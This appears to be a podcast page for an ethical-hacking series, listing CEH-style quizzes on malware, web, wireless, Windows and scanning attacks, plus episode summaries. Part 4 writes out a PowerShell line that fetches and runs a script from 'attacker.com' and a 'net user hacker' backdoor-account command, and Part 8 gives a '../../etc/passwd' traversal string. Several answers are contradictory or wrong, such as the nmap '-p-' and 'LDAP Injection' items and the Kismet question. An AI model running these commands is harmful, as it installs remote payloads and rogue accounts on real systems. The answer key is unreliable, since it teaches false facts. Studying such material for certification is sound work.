Episodes

  • Part 9: Malware Threats and Analysis (15 Questions)

    1. Which type of malware disguises itself as legitimate software to deceive users?

    • A) Ransomware

    • B) Spyware

    • C) Trojan Horse

    • D) Worm

    Answer: C) Trojan Horse

    2. What malware self-replicates without user intervention to spread across networks?

    • A) Virus

    • B) Worm

    • C) Rootkit

    • D) Spyware

    Answer: B) Worm

    3. Which malware encrypts a victim’s data and demands payment for decryption?

    • A) Adware

    • B) Ransomware

    • C) Keylogger

    • D) Spyware

    Answer: B) Ransomware

    4. What type of malware records a victim’s keystrokes to steal sensitive information?

    • A) Adware

    • B) Keylogger

    • C) Rootkit

    • D) Botnet

    Answer: B) Keylogger

    5. Which malware resides in a system’s kernel or firmware to maintain persistent access?

    • A) Rootkit

    • B) Worm

    • C) Adware

    • D) Trojan

    Answer: A) Rootkit

    6. Which malware exploits the Master Boot Record (MBR) to execute malicious code before the operating system loads?

    • A) Fileless Malware

    • B) Bootkit

    • C) Worm

    • D) Logic Bomb

    Answer: B) Bootkit

    7. Which type of malware embeds itself directly into system memory without creating permanent files?

    • A) Rootkit

    • B) Spyware

    • C) Fileless Malware

    • D) Ransomware

    Answer: C) Fileless Malware

    8. Which attack manipulates legitimate software to execute malicious code during runtime?

    • A) DLL Injection

    • B) Polymorphic Malware

    • C) Ransomware

    • D) Worm

    Answer: A) DLL Injection

    9. What technique allows malware to modify its code signature to evade detection?

    • A) Obfuscation

    • B) Polymorphism

    • C) Heuristics

    • D) Backdoor

    Answer: B) Polymorphism

    10. Which malware type connects infected devices to a central command-and-control (C2) server?

    • A) Spyware

    • B) Botnet

    • C) Keylogger

    • D) Adware

    Answer: B) Botnet

    11. What malware triggers malicious actions when predefined conditions are met?

    • A) Rootkit

    • B) Logic Bomb

    • C) Worm

    • D) Adware

    Answer: B) Logic Bomb

    12. Which of the following malware types is designed to generate unwanted advertisements?

    • A) Spyware

    • B) Ransomware

    • C) Adware

    • D) Trojan

    Answer: C) Adware

    13. What malware technique leverages PowerShell or WMI for stealth attacks without dropping executable files?

    • A) Fileless Malware

    • B) Rootkit

    • C) Ransomware

    • D) Botnet

    Answer: A) Fileless Malware

    14. Which attack method plants malicious code inside legitimate application updates?

    • A) Supply Chain Attack

    • B) Side-Channel Attack

    • C) Zero-Day Attack

    • D) Credential Stuffing

    Answer: A) Supply Chain Attack

    15. Which malware type encrypts data and demands ransom while threatening to leak sensitive information if payment isn’t made?

    • A) Ransomware

    • B) Scareware

    • C) Cryptojacking

    • D) Doxware

    Answer: D) Doxware

  • Part 8: Web Application Attacks (15 Questions)

    1. Which attack exploits unsanitized user input to execute malicious SQL commands?

    • A) Cross-Site Scripting (XSS)

    • B) SQL Injection (SQLi)

    • C) Directory Traversal

    • D) Session Hijacking

    Answer: B) SQL Injection (SQLi)

    2. Which web attack aims to execute malicious scripts in a victim’s browser via trusted websites?

    • A) Cross-Site Scripting (XSS)

    • B) Cross-Site Request Forgery (CSRF)

    • C) Broken Authentication

    • D) IDOR Attack

    Answer: A) Cross-Site Scripting (XSS)

    3. What is the primary goal of a Cross-Site Request Forgery (CSRF) attack?

    • A) To trick the victim into executing unintended actions on a trusted site

    • B) To capture session cookies

    • C) To escalate user privileges

    • D) To perform remote code execution

    Answer: A) To trick the victim into executing unintended actions on a trusted site

    4. Which HTTP method is most commonly exploited in file upload vulnerabilities?

    • A) GET

    • B) POST

    • C) PUT

    • D) DELETE

    Answer: C) PUT

    5. An attacker manipulates URL parameters to gain unauthorized access to resources. What attack is this?

    • A) IDOR Attack

    • B) CSRF Attack

    • C) XSS Attack

    • D) SQL Injection

    Answer: A) IDOR Attack

    6. What security vulnerability allows attackers to bypass authentication mechanisms via URL manipulation?

    • A) Directory Traversal

    • B) Command Injection

    • C) Path Manipulation

    • D) Broken Access Control

    Answer: D) Broken Access Control

    7. Which attack relies on injecting malicious commands directly into a vulnerable web application’s operating system?

    • A) SQL Injection

    • B) Command Injection

    • C) Remote File Inclusion (RFI)

    • D) Cross-Site Scripting (XSS)

    Answer: B) Command Injection

    8. Which web attack technique manipulates input fields to bypass client-side validation and inject malicious payloads?

    • A) Form Injection

    • B) SQL Injection

    • C) Buffer Overflow

    • D) LDAP Injection

    Answer: D) LDAP Injection

    9. What security header can help mitigate Cross-Site Scripting (XSS) attacks?

    • A) X-Content-Type-Options

    • B) Strict-Transport-Security

    • C) Content-Security-Policy (CSP)

    • D) Cache-Control

    Answer: C) Content-Security-Policy (CSP)

    10. Which web attack exploits weak session management by stealing or predicting session tokens?

    • A) Clickjacking

    • B) Cookie Poisoning

    • C) Session Hijacking

    • D) IDOR Attack

    Answer: C) Session Hijacking

    11. What is the primary goal of a Clickjacking attack?

    • A) To inject malicious code into web forms

    • B) To trick users into clicking invisible elements

    • C) To modify cookie values

    • D) To manipulate URL parameters

    Answer: B) To trick users into clicking invisible elements

    12. An attacker uses ../../etc/passwd in a URL to gain unauthorized access to system files. What attack is this?

    • A) SQL Injection

    • B) Directory Traversal

    • C) Remote File Inclusion (RFI)

    • D) Path Manipulation

    Answer: B) Directory Traversal

    13. Which OWASP Top 10 vulnerability relates to failing to properly validate uploaded files?

    • A) Injection

    • B) Security Misconfiguration

    • C) Insecure Deserialization

    • D) Unrestricted File Upload

    Answer: D) Unrestricted File Upload

    14. What type of attack involves including malicious scripts in web pages that execute on other users’ browsers?

    • A) DOM-based XSS

    • B) Stored XSS

    • C) Reflected XSS

    • D) Blind XSS

    Answer: B) Stored XSS

    15. Which tool is widely used for discovering web application vulnerabilities through automated scanning?

    • A) Hydra

    • B) Nikto

    • C) John the Ripper

    • D) Metasploit

    Answer: B) Nikto


  • Part 7: Wireless Attacks (15 Questions)

    1. Which wireless security protocol is considered the weakest and easiest to crack?

    • A) WPA3

    • B) WPA2

    • C) WEP

    • D) 802.1X

    Answer: C) WEP

    2. What attack captures wireless network packets to exploit encryption weaknesses?

    • A) Rogue AP Attack

    • B) Evil Twin Attack

    • C) Packet Sniffing

    • D) IV Attack

    Answer: D) IV Attack

    3. Which tool is commonly used to perform packet capturing on wireless networks?

    • A) Metasploit

    • B) Wireshark

    • C) John the Ripper

    • D) Nessus

    Answer: B) Wireshark

    4. An attacker creates a fake access point (AP) with the same SSID as a legitimate network. What type of attack is this?

    • A) War driving

    • B) Evil Twin Attack

    • C) Rogue AP Attack

    • D) Deauthentication Attack

    Answer: B) Evil Twin Attack

    5. Which of the following tools is commonly used to perform a deauthentication attack?

    • A) Reaver

    • B) Aircrack-ng

    • C) Kismet

    • D) NetStumbler

    Answer: B) Aircrack-ng

    6. What is the primary goal of a deauthentication attack?

    • A) To intercept encrypted passwords

    • B) To force clients off the network for denial of service

    • C) To scan for open ports on a router

    • D) To crack WPS PINs

    Answer: B) To force clients off the network for denial of service

    7. What is the primary risk of using public Wi-Fi networks?

    • A) High latency

    • B) IP address conflicts

    • C) Packet interception and man-in-the-middle attacks

    • D) Limited bandwidth

    Answer: C) Packet interception and man-in-the-middle attacks

    8. Which wireless security protocol offers the strongest encryption as of today?

    • A) WPA3

    • B) WPA2

    • C) WEP

    • D) TKIP

    Answer: A) WPA3

    9. Which wireless attack targets devices with WPS (Wi-Fi Protected Setup) enabled?

    • A) IV Attack

    • B) War driving

    • C) Reaver Attack

    • D) MAC Spoofing

    Answer: C) Reaver Attack

    10. What is the purpose of MAC address filtering in wireless networks?

    • A) To encrypt wireless traffic

    • B) To prevent unauthorized devices from connecting

    • C) To improve bandwidth management

    • D) To detect packet collisions

    Answer: B) To prevent unauthorized devices from connecting

    11. Which attack involves driving around to locate and exploit unsecured wireless networks?

    • A) War driving

    • B) War chalking

    • C) Rogue AP Attack

    • D) MITM Attack

    Answer: A) War driving

    12. What is the primary risk associated with rogue access points?

    • A) Physical damage to network hardware

    • B) Overloading network bandwidth

    • C) Unauthorized network access and data interception

    • D) IP address conflicts

    Answer: C) Unauthorized network access and data interception

    13. Which type of wireless attack relies on signal jamming to create network interference?

    • A) Jamming Attack

    • B) Rogue AP Attack

    • C) Beacon Flood Attack

    • D) Replay Attack

    Answer: A) Jamming Attack

    14. An attacker uses software to repeatedly broadcast fake SSID beacons, overwhelming available network options. What is this attack called?

    • A) Rogue AP Attack

    • B) Deauthentication Attack

    • C) Beacon Flood Attack

    • D) Packet Sniffing

    Answer: C) Beacon Flood Attack

    15. Which wireless penetration testing tool is known for conducting advanced wireless assessments, including packet sniffing, deauthentication attacks, and WPA cracking?

    • A) Hydra

    • B) Burp Suite

    • C) Kismet

    • D) Nmap

    Answer: C) Kismet

  • 1. What type of attack manipulates query parameters to exploit web databases?

    • A) Cross-Site Scripting

    • B) Command Injection

    • C) SQL Injection

    • D) Clickjacking

    Answer: C) SQL Injection

    Explanation: SQL Injection inserts malicious SQL queries into web forms to manipulate backend databases.

    2. Which technique exploits web page scripts to execute malicious code in browsers?

    • A) SQL Injection

    • B) Cross-Site Scripting (XSS)

    • C) Remote File Inclusion

    • D) DNS Spoofing

    Answer: B) Cross-Site Scripting (XSS)

    Explanation: XSS allows attackers to inject malicious scripts into web pages viewed by other users.

    3. Which HTTP method is most vulnerable to data exfiltration attacks?

    • A) POST

    • B) PUT

    • C) DELETE

    • D) GET

    Answer: D) GET

    Explanation: Sensitive data passed via GET URLs can be stored in logs or browser history, making it vulnerable.

    4. Which tool is most commonly used for web application penetration testing?

    • A) Nessus

    • B) Burp Suite

    • C) Wireshark

    • D) Hydra

    Answer: B) Burp Suite

    Explanation: Burp Suite is a powerful toolkit for mapping, analyzing, and attacking web applications.

    5. Which web attack exploits weak session management?

    • A) CSRF

    • B) Buffer Overflow

    • C) Directory Traversal

    • D) XXE Injection

    Answer: A) CSRF

    Explanation: Cross-Site Request Forgery (CSRF) manipulates authenticated users into executing unintended actions.

    6. What is a common defense against XSS attacks?

    • A) Using CAPTCHA

    • B) Encrypting user data

    • C) Implementing input validation and output encoding

    • D) Blocking UDP traffic

    Answer: C) Implementing input validation and output encoding

    Explanation: Input validation and output encoding neutralize malicious data to prevent script execution.

    7. What is the primary risk of a directory traversal attack?

    • A) Gaining administrator privileges

    • B) Extracting files outside the web root directory

    • C) Manipulating server-side code

    • D) Modifying DNS records

    Answer: B) Extracting files outside the web root directory

    Explanation: Directory traversal exploits path manipulation to access unauthorized files on the server.

    8. Which attack manipulates an insecure deserialization vulnerability?

    • A) LDAP Injection

    • B) XML Injection

    • C) Deserialization Attack

    • D) Clickjacking

    Answer: C) Deserialization Attack

    Explanation: Deserialization attacks exploit insecure object deserialization to inject malicious code.

    9. Which tool is best for performing brute force attacks on web login pages?

    • A) Nikto

    • B) John the Ripper

    • C) Hydra

    • D) Metasploit

    Answer: C) Hydra

    Explanation: Hydra efficiently performs automated brute-force attacks against web login pages.

    10. Which HTTP header can mitigate clickjacking attacks?

    • A) X-Frame-Options

    • B) Content-Type

    • C) Strict-Transport-Security

    • D) Cache-Control

    Answer: A) X-Frame-Options

    Explanation: The X-Frame-Options header prevents web pages from being embedded in iframes, blocking clickjacking attempts.

    Bonus: What type of web attack exploits unsanitized user input in database queries?

    • A) Cross-Site Scripting (XSS)

    • B) SQL Injection (SQLi)

    • C) Directory Traversal

    • D) Clickjacking

    Answer: B) SQL Injection (SQLi)

    Explanation: SQL Injection occurs when attackers manipulate user input to execute unauthorized SQL commands, often exposing database contents.

  • 1. Which of the following is an example of a pretexting attack?

    • A) Sending phishing emails with malicious links

    • B) Impersonating an IT technician to gain system access

    • C) Deploying malware through USB drives

    • D) Exploiting unpatched software vulnerabilities

    Answer: B) Impersonating an IT technician to gain system access

    2. Which social engineering tactic involves enticing users to plug in infected devices like USB drives?

    • A) Shoulder surfing

    • B) Tailgating

    • C) Baiting

    • D) Quid pro quo

    Answer: C) Baiting

    3. An attacker calls a company’s help desk claiming to be the CFO, requesting urgent access to their email account. Which technique is being used?

    • A) Vishing

    • B) Pharming

    • C) Phishing

    • D) Impersonation

    Answer: A) Vishing

    4. Which social engineering method manipulates victims into revealing sensitive information by posing as a trusted website?

    • A) Phishing

    • B) Smishing

    • C) Eavesdropping

    • D) Tailgating

    Answer: A) Phishing

    5. An attacker follows an employee through a secure door by pretending to be on a phone call and avoiding eye contact. Which technique is this?

    • A) Baiting

    • B) Shoulder surfing

    • C) Tailgating

    • D) Dumpster diving

    Answer: C) Tailgating

    6. Which social engineering tactic involves sending fake SMS messages to manipulate users into revealing information?

    • A) Pharming

    • B) Smishing

    • C) Vishing

    • D) Spear phishing

    Answer: B) Smishing

    7. What is the primary goal of a spear phishing attack?

    • A) Disrupt network connectivity

    • B) Target a broad group of users

    • C) Deceive specific individuals for sensitive data

    • D) Infect systems with ransomware

    Answer: C) Deceive specific individuals for sensitive data

    8. Which method involves attackers searching through discarded documents for sensitive information?

    • A) Phishing

    • B) Dumpster diving

    • C) Shoulder surfing

    • D) Spoofing

    Answer: B) Dumpster diving

    9. An attacker sends a message claiming the victim’s account will be locked unless they provide login credentials. Which attack type is this?

    • A) Social engineering

    • B) Pharming

    • C) Smishing

    • D) Phishing

    Answer: D) Phishing

    10. Which of the following describes a “quid pro quo” attack?

    • A) Offering free software in exchange for user credentials

    • B) Demanding a ransom for stolen data

    • C) Infecting websites to steal session cookies

    • D) Leveraging unpatched system vulnerabilities

    Answer: A) Offering free software in exchange for user credentials

    11. Which of the following is a common goal of impersonation attacks?

    • A) To infect the system with malware

    • B) To bypass antivirus detection

    • C) To gain trust and extract information

    • D) To perform denial-of-service attacks

    Answer: C) To gain trust and extract information

    12. Which technique involves secretly observing a user entering their credentials?

    • A) Pharming

    • B) Eavesdropping

    • C) Shoulder surfing

    • D) Tailgating

    Answer: C) Shoulder surfing

    13. What is the primary defense against social engineering attacks?

    • A) Strong passwords

    • B) Network firewalls

    • C) User awareness training

    • D) Antivirus software

    Answer: C) User awareness training

    14. An attacker registers a website named “paypa1.com” to trick users into logging in. Which technique is this?

    • A) Pharming

    • B) Typosquatting

    • C) Vishing

    • D) Pretexting

    Answer: B) Typosquatting

    15. What is the primary objective of a “watering hole attack”?

    • A) To exploit social media vulnerabilities

    • B) To infect websites frequently visited by the target

    • C) To intercept email communications

    • D) To compromise VPN connections

    Answer: B) To infect websites frequently visited by the target

  • Part 4: Windows System Hacking Techniques and Tools (15 Questions)

    1. The most common technique attackers use to escalate privileges on a Windows system is the Pass-the-Hash attack. This exploit leverages Windows’ authentication mechanisms by using hashed credentials instead of plaintext passwords, allowing attackers to impersonate users without knowing the original password.

    2. The Windows tool tasklist allows you to manage system processes, services, and performance monitoring from a command line. It displays all running processes and their Process IDs (PIDs), aiding in identifying suspicious activities.

    3. EternalBlue is a tool commonly used for exploiting the SMB protocol on Windows systems. It targets Windows systems vulnerable to CVE-2017-0144, enabling remote code execution.

    4. The Windows command net user is used to add a new user account. It can create and modify user accounts, for example: net user hacker P@ssw0rd /add.

    5. Metasploit is widely used for creating payloads to exploit Windows vulnerabilities. It is a powerful platform for developing, testing, and executing exploits against Windows targets.

    6. Regedit is the Windows utility used to modify the system registry. It is commonly targeted by attackers to establish persistence or modify system settings.

    7. The PowerShell command Invoke-WebRequest can download and execute a malicious script directly from memory. It fetches remote payloads: Invoke-WebRequest -Uri “http://attacker.com/malware.ps1” | Invoke-Expression.

    8. DLL injection allows attackers to hide malicious code inside legitimate Windows processes like explorer.exe. It involves injecting malicious code into trusted Windows processes, bypassing security tools.

    9. Cain & Abel is the best tool for performing password dumping from Windows systems. It is a powerful tool for recovering Windows passwords using techniques like sniffing, dictionary attacks, and password dumping.

    10. The SAM file in Windows stores hashed user passwords for local accounts. Attackers often target this file to extract password hashes.

    11. John the Ripper is a tool designed to crack NTLM password hashes from Windows systems. It efficiently cracks NTLM, LM, and other hash types for password recovery.

    12. PsExec in a Windows environment serves the purpose of remotely executing processes on Windows systems. Part of the Sysinternals Suite, it allows administrators and attackers to remotely execute commands on Windows machines.

    13. The PowerShell command Get-Process can list all running processes on a Windows machine. It displays detailed information about active processes, including their CPU and memory usage.

    14. Cuckoo Sandbox is the Windows tool designed for analyzing suspicious files by observing their behavior in a sandboxed environment. It is an open-source platform for analyzing malicious files, detecting potential threats in a controlled environment.

    15. DLL hijacking manipulates Windows services to gain persistence. It occurs when an attacker places a malicious DLL in a path Windows trusts, enabling code execution with elevated privileges.

  • Part 3: Network Scanning and Enumeration Techniques (15 Questions)

    1. What defines network scanning?

    • A) Finding web app vulnerabilities

    • B) Mapping a network for active hosts and services

    • C) Capturing network packets for analysis

    • D) Exploiting open ports on a target

    Answer: B) Mapping a network for active hosts and services

    Explanation: Network scanning identifies live hosts, services, and vulnerabilities. Tools like Nmap are used.

    2. Which tool is best for port scanning?

    • A) Wireshark

    • B) Nmap

    • C) Metasploit

    • D) Nessus

    Answer: B) Nmap

    Explanation: Nmap scans IPs, detects open ports, and identifies services.

    3. Which Nmap command performs a SYN scan on 192.168.1.0/24?

    • A) nmap -sT 192.168.1.0/24

    • B) nmap -sP 192.168.1.0/24

    • C) nmap -sV 192.168.1.0/24

    • D) nmap -sS 192.168.1.0/24

    Answer: D) nmap -sS 192.168.1.0/24

    Explanation: The -sS flag performs a SYN scan to detect open ports without a full connection.

    4. Which scan type bypasses firewalls and IDS?

    • A) TCP Connect Scan

    • B) UDP Scan

    • C) SYN Scan

    • D) ACK Scan

    Answer: C) SYN Scan

    Explanation: A SYN scan sends a SYN packet but doesn’t complete the handshake, making it stealthier.

    5. Which Nmap flag identifies a target’s OS?

    • A) -O

    • B) -sV

    • C) -Pn

    • D) -A

    Answer: A) -O

    Explanation: The -O flag enables OS detection by analyzing packet responses.

    6. Which protocol is scanned during UDP scans?

    • A) ICMP

    • B) HTTP

    • C) DNS

    • D) SMB

    Answer: C) DNS

    Explanation: DNS uses UDP for queries, making it a key target in UDP scans.

    7. Which Nmap command scans all open ports on a target IP using the default 1000 port range?

    • A) nmap -p- [IP]

    • B) nmap -p 1-65535 [IP]

    • C) nmap -sU [IP]

    • D) nmap -T4 [IP]

    Answer: A) nmap -p- [IP]

    Explanation: The -p- flag scans all 65,535 ports for comprehensive coverage.

    8. What scan type sends FIN packets to closed ports?

    • A) Xmas Scan

    • B) FIN Scan

    • C) NULL Scan

    • D) ACK Scan

    Answer: B) FIN Scan

    Explanation: A FIN scan sends a TCP packet with only the FIN flag set. Closed ports typically respond with a RST packet.

    9. Which enumeration technique queries a DNS server for subdomains and records?

    • A) Zone transfer

    • B) Footprinting

    • C) DNS poisoning

    • D) ARP spoofing

    Answer: A) Zone transfer

    Explanation: A DNS zone transfer retrieves records like A, MX, and CNAME, revealing insights about the network structure.

    10. Which tool enumerates NetBIOS shares and services?

    • A) Netcat

    • B) Responder

    • C) Nbtscan

    • D) SQLmap

    Answer: C) Nbtscan

    Explanation: Nbtscan scans and enumerates NetBIOS services, revealing active systems and shared resources.

    11. Which protocol is exploited during SMB enumeration?

    • A) ICMP

    • B) HTTP

    • C) FTP

    • D) SMBv1

    Answer: D) SMBv1

    Explanation: SMBv1 is vulnerable to attacks like EternalBlue, making it a common enumeration target.

    12. Which Nmap command enables verbose output?

    • A) nmap -v

    • B) nmap -A

    • C) nmap -sP

    • D) nmap -vv

    Answer: D) nmap -vv

    Explanation: The -vv flag increases verbosity, providing real-time updates and detailed insights during scanning.

    13. Which tool is best for brute-force enumeration of usernames?

    • A) Hydra

    • B) John the Ripper

    • C) sqlmap

    • D) Hashcat

    Answer: A) Hydra

    Explanation: Hydra is a login cracker used to brute-force services like SSH, FTP, and SMB to enumerate valid usernames.

    14. Which tool is designed for SNMP enumeration?

    • A) SNMPwalk

    • B) Aircrack-ng

    • C) John the Ripper

    • D) Ettercap

    Answer: A) SNMPwalk

    Explanation: SNMPwalk enumerates SNMP data from network devices.

    15. Which Nmap scan bypasses firewall rules blocking SYN packets?

    • A) NULL Scan

    • B) Xmas Scan

    • C) FIN Scan

    • D) ACK Scan

    Answer: D) ACK Scan

    Explanation: An ACK scan identifies firewall rules by sending TCP packets with the ACK flag set, determining filtered ports.

  • Part 2: Reconnaissance & Footprinting (15 Questions)

    1. What is the main goal of the reconnaissance phase in ethical hacking?

    • A) Exploiting vulnerabilities

    • B) Identifying security controls

    • C) Gathering target information

    • D) Delivering payloads

    Answer: C) Gathering target information

    Explanation: Reconnaissance involves collecting details like domains, IPs, employee info, and network architecture.

    2. Which is an example of passive reconnaissance?

    • A) Nmap port scan

    • B) Social media monitoring

    • C) Phishing attack

    • D) SQL injection

    Answer: B) Social media monitoring

    Explanation: Passive reconnaissance gathers public info without engaging the target, like WHOIS lookups or Google Dorking.

    3. Which tool performs WHOIS lookups?

    • A) Maltego

    • B) nslookup

    • C) WHOIS

    • D) Nikto

    Answer: C) WHOIS

    Explanation: WHOIS reveals domain registration, owner details, and DNS info.

    4. Which technique extracts sensitive data via search engines?

    • A) Google Dorking

    • B) DNS Spoofing

    • C) Phishing

    • D) ARP Poisoning

    Answer: A) Google Dorking

    Explanation: Google Dorking uses search operators to locate exposed files and misconfigured servers.

    5. Which command performs DNS zone transfers?

    • A) nslookup

    • B) whois

    • C) dig

    • D) ping

    Answer: C) dig

    Explanation: The dig command queries DNS records like A, MX, and TXT for zone information.

    6. What reconnaissance technique intercepts wireless communications?

    • A) Phishing

    • B) Wardriving

    • C) Social engineering

    • D) Footprinting

    Answer: B) Wardriving

    Explanation: Wardriving involves driving around to locate unsecured Wi-Fi networks.

    7. Which tool gathers email addresses linked to a domain?

    • A) TheHarvester

    • B) Nikto

    • C) Nessus

    • D) Hydra

    Answer: A) TheHarvester

    Explanation: TheHarvester collects emails, domains, and employee info via search engines and public sources.

    8. What technique identifies a target’s network range and IP structure?

    • A) Banner grabbing

    • B) Port scanning

    • C) Footprinting

    • D) Fingerprinting

    Answer: C) Footprinting

    Explanation: Footprinting maps IP addresses, DNS info, and system configurations.

    9. Which tool maps relationships between organizations, social media, and domains?

    • A) Maltego

    • B) Metasploit

    • C) Nikto

    • D) sqlmap

    Answer: A) Maltego

    Explanation: Maltego visualizes connections across networks and social platforms.

    10. Which command identifies a domain’s mail server?

    • A) ping

    • B) traceroute

    • C) nslookup

    • D) netcat

    Answer: C) nslookup

    Explanation: nslookup -type=MX [domain] reveals mail server info.

    11. Which method uses impersonation or pretexting to gather information?

    • A) Passive reconnaissance

    • B) Active reconnaissance

    • C) Human reconnaissance

    • D) Hybrid reconnaissance

    Answer: C) Human reconnaissance

    Explanation: Human reconnaissance exploits social engineering tactics to extract data.

    12. Which tool maps web application attack surfaces?

    • A) Burp Suite

    • B) Aircrack-ng

    • C) Hashcat

    • D) Ettercap

    Answer: A) Burp Suite

    Explanation: Burp Suite identifies web application vulnerabilities.

    13. Which technique targets employees with customized attacks?

    • A) Whaling

    • B) Footprinting

    • C) Spear phishing

    • D) Dumpster diving

    Answer: C) Spear phishing

    Explanation: Spear phishing personalizes attacks using gathered employee details.

    14. Which reconnaissance type directly interacts with target systems?

    • A) Passive reconnaissance

    • B) Active reconnaissance

    • C) Hybrid reconnaissance

    • D) Dynamic reconnaissance

    Answer: B) Active reconnaissance

    Explanation: Active reconnaissance involves direct engagement like port scanning.

    15. Which technique retrieves sensitive data from discarded items?

    • A) Baiting

    • B) Dumpster diving

    • C) Tailgating

    • D) Pharming

    Answer: B) Dumpster diving

    Explanation: Dumpster diving involves searching trash for useful data.

  • Part 1: Ethical Hacking Fundamentals (10 Questions)

    1. What is the main aim of a penetration test?

    • A) Network performance issues

    • B) Find vulnerabilities before attackers

    • C) Enhance software development

    • D) Prevent unauthorized access

    Answer: B) Find vulnerabilities before attackers

    2. Which method uses tools to check systems for known weaknesses?

    • A) Fuzzing

    • B) Static Analysis

    • C) Vulnerability Scanning

    • D) Social Engineering

    Answer: C) Vulnerability Scanning

    3. What distinguishes a black-box from a white-box penetration test?

    • A) White-box testers have no knowledge of the system

    • B) Black-box testers mimic insiders

    • C) Black-box testers have no prior system knowledge

    • D) White-box testers focus on social engineering

    Answer: C) Black-box testers have no prior system knowledge

    4. Which attack vector targets the human element in security?

    • A) Phishing

    • B) DNS Spoofing

    • C) ARP Poisoning

    • D) MITM Attack

    Answer: A) Phishing

    5. Which security framework provides key controls for enterprise networks?

    • A) ISO 27001

    • B) OWASP Top 10

    • C) MITRE ATT&CK

    • D) NIST 800-53

    Answer: D) NIST 800-53

    6. What type of hacker is driven by social, political, or ideological causes?

    • A) Black Hat

    • B) White Hat

    • C) Gray Hat

    • D) Hacktivist

    Answer: D) Hacktivist

    7. What is the main goal of a honeypot?

    • A) Encrypt network data

    • B) Monitor user behavior

    • C) Distract attackers and gather intelligence

    • D) Protect against SQL Injection

    Answer: C) Distract attackers and gather intelligence

    8. What is the primary purpose of the OWASP Top 10?

    • A) Compliance audit checklist

    • B) Encryption algorithm standards

    • C) Guideline for identifying web application risks

    • D) Tool for tracking zero-day vulnerabilities

    Answer: C) Guideline for identifying web application risks

    9. Which phase of ethical hacking identifies active IP addresses in the target network?

    • A) Reconnaissance

    • B) Scanning

    • C) Gaining Access

    • D) Covering Tracks

    Answer: B) Scanning

    10. What legal agreement defines an ethical hacker’s authorized actions during testing?

    • A) Service Level Agreement (SLA)

    • B) Non-Disclosure Agreement (NDA)

    • C) Rules of Engagement (RoE)

    • D) End-User License Agreement (EULA)

    Answer: C) Rules of Engagement (RoE)

    Bonus: What is a passive reconnaissance method?

    • A) Nmap Scan

    • B) Social Engineering

    • C) WHOIS Lookup

    • D) SQL Injection

    Answer: C) WHOIS Lookup

  • Edward Henriquez's podcast episode, "Decoded: Web Application Hacking," uses "The Web Application Hacker’s Handbook" as a foundation to explore prevalent web application attacks. The episode introduces fundamental concepts and then examines specific vulnerabilities, such as SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), and command injection, explaining how these attacks are executed and their potential impact. For each attack type, Henriquez provides illustrative scenarios and outlines key defense strategies. The podcast concludes by emphasizing the continuous nature of web security and the importance of proactive measures like secure development practices and penetration testing.

  • The Decoded podcast episode, hosted by Edward Henriquez, explores real-world hacking tactics drawn from Peter Kim's Hacker Playbook series, moving beyond fictional portrayals. It details the stages of an attack, starting with reconnaissance using OSINT and tools like Shodan and Nmap to gather information. The episode then examines exploitation techniques that target vulnerabilities with tools such as Burp Suite and Mimikatz. Further discussion covers pivoting and escalation within a network using methods like pass-the-hash and PowerShell Empire. Finally, the podcast addresses how attackers cover their tracks and provides key defensive strategies like penetration testing and employee training to mitigate these threats.

  • The podcast episode "Decoded – Unmasking the CEH" provides a comprehensive guide to the Certified Ethical Hacker (CEH) certification. Hosted by Edward Henriquez, the episode outlines what the CEH is, its significance in cybersecurity, and the career opportunities it can unlock. It thoroughly breaks down the 20 domains covered in the CEH exam, including topics like reconnaissance, network scanning, system hacking, and web application attacks. The podcast also offers advice on how to effectively prepare for the exam, suggesting study materials, hands-on practice, and the use of specific tools. Furthermore, it discusses the value of the CEH certification in comparison to other cybersecurity credentials. Ultimately, the episode aims to equip listeners with a clear understanding of the CEH and the steps needed to pursue it.

  • Decoded: The Open-Source Arsenal – Deep Dive into DFIR Tools is a podcast episode hosted by Edward Henriquez that explores a variety of open-source tools critical for digital forensics and incident response (DFIR). The episode examines tools used in disk and memory forensics, such as Autopsy, The Sleuth Kit, Volatility, and Rekall, for analyzing compromised systems and memory dumps. It further discusses network forensics with Wireshark, Zeek, and Suricata for traffic analysis and threat detection. Additionally, the episode covers log and event analysis using the ELK Stack and Graylog, as well as malware analysis with YARA, Ghidra, and Radare2. Finally, it touches upon incident response and threat hunting tools like Velociraptor, GRR Rapid Response, and Osquery, and concludes with cloud forensics tools for AWS and GCP, highlighting their importance in uncovering cyber threats.

  • This podcast episode of "Decoded" explores the importance of Unix in cybersecurity. It traces Unix's origins and its influence on modern operating systems and security practices. The episode highlights essential Unix commands for security professionals and explains effective patching and update strategies. It also shows how to use Ansible for automating Unix security tasks such as enforcing policies, deploying intrusion detection tools, and managing user privileges. Ultimately, the podcast underscores why proficiency in Unix is critical for anyone serious about a career in cybersecurity.

  • Edward Henriquez hosts the "Decoded Podcast". The YouTube video by "UnixGuy | Cyber Security" outlines a comprehensive six-month plan for individuals seeking entry-level cybersecurity positions without prior experience or degrees. It emphasizes practical, hands-on skills, starting with the Google Cybersecurity Certificate. The plan includes resume building, focusing on relevant experience, immediately applying for jobs to gain confidence, becoming a cybersecurity generalist before specializing, participating in virtual internships, and engaging in intermediate-level training.

  • PurpleLab is an open-source cybersecurity lab designed to help security teams detect, analyze, and simulate cyber threats. It provides a sandboxed environment with tools for testing detection rules, generating realistic logs, and executing malware. The lab includes a web interface, a Windows 10 virtual machine with forensic tools, and integration with the ELK stack for log analysis. Administrators can configure LDAP settings and API keys, as well as set up integration with Splunk. PurpleLab requires a clean installation of Ubuntu Server 22.04 and offers various pages for monitoring, hunting, simulating attacks, and managing system health.

  • This podcast episode of Decoded, hosted by Edward Henriquez, addresses the ever-present threat of password cracking. It explores three common methods used by hackers: brute force attacks, dictionary attacks, and rainbow table attacks. For each technique, Henriquez provides real-world examples of successful breaches, highlighting the potential damage. Most importantly, the podcast offers actionable advice on how individuals and organizations can strengthen their password security through strategies like using long, complex passwords, enabling multi-factor authentication, and implementing robust password policies. The goal is to empower listeners with the knowledge to defend themselves against these prevalent cyber threats.

  • This curated list highlights top books for mastering Open-Source Intelligence (OSINT). The texts cover diverse aspects, from cybercrime investigation and strategic thinking to human rights documentation and digital privacy. Several books offer practical guidance on OSINT techniques, data analysis, and ethical considerations. Some focus on applying OSINT in specific domains like cybersecurity and corporate due diligence. Others explore the psychological dimensions of social engineering for ethical intelligence gathering. Overall, the collection equips readers with comprehensive knowledge for leveraging publicly available data across various fields.

